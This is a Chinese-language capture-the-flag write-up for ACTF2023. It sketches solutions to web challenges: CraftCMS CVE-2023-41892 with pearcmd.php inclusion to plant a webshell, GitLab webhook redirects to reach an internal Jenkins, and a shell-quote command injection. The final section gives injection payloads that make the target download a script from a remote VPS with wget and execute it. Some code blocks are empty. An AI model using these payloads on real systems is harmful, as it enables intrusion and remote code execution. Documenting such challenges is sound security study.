ACTF2023 WP
东方原神大学-MISC
fofa 秒了
MyGO’s Live!!!!!-WEB
请求:http://124.70.33.170:24000/checker?url=124.70.33.170:80
直接自己namp
Craftcms–WEB
craftcms
CVE-2023-41892
网上有POC(无果)
https://gist.github.com/gmh5225/8fad5f02c2cf0334249614eb80cbf4ce
看了一下poc,出现的地方应该是\craft\controllers\ConditionsController
猜一手是反序列化+RCE
https://blog.calif.io/p/craftcms-rce
构造了一下poc
但是好像只能执行phpinfo
发现了账号密码,登录
备份了下数据库,没看见有什么东西
思路二:https://www.anquanke.com/post/id/201136 https://www.cnblogs.com/Xy–1/p/12769094.html https://github.com/vulhub/vulhub/tree/master/php/inclusion
思路三:percmd https://www.leavesongs.com/PENETRATION/docker-php-include-getshell.html
思路三可以,
pearcmd写入文件
先用cve包含pearcmd.php然后写入shell
包含
|
|
写入
|
|
包含了但是执行/readflag没有回显
蚁剑连一下然后加一个文件
|
|
直接访问即可
Hook-WEB BY 王曦(赛后)
Gateway: http://124.70.33.170:8088/
Intranet jenkins service: http://jenkins:8080/
Hint: Please Abuse Gitxxb Webhooks
大概看一下题目,猜测需要从nginx打SSRF或者请求走私到内网jenkins,然后实现一些操作。
无论如何访问nginx服务都是403的状况,根据提示尝试Github/Gitlab的webhook
在参考文章1和2中发现了有段描述·
gitlab访问webhook如果出现302可以自动重定向。尝试重定向访问网站 接下来在gitlab中新建project,webhook向vps请求,发生跳转(直接请求地址返回Method Not Allowed) 访问成功,提示了需要加入参数
成功访问内网服务
注意一下编码
参考文章
- https://www.cidersecurity.io/blog/research/how-we-abused-repository-webhooks-to-access-internal-ci-systems-at-scale/
- https://www.paloaltonetworks.com/blog/prisma-cloud/repository-webhook-abuse-access-ci-cd-systems-at-scale/
- https://devco.re/blog/2019/02/19/hacking-Jenkins-part2-abusing-meta-programming-for-unauthenticated-RCE/
- https://aluvion.github.io/2019/02/26/CVE-2019-1003000%E5%A4%8D%E7%8E%B0/
- https://vulhub.org/#/environments/jenkins/CVE-2018-1000861/
Ave Mujica’s Masquerade-WEB BY 王曦(赛后)
参考
https://wh0.github.io/2021/10/28/shell-quote-rce-exploiting.html
::
firefox``:`
发现可以RCE
构造wget \3.137.154.242/1 -O /tmp/1.sh,空格替换成$IFS尝试下载
checker?url=127.0.0.1::
wget$IFS\vps:port/1$IFS-O$IFS/tmp/1.sh``:`
然后调用/tmp/1.sh
checker?url=127.0.0.1::
sh$IFS/tmp/1.sh``:`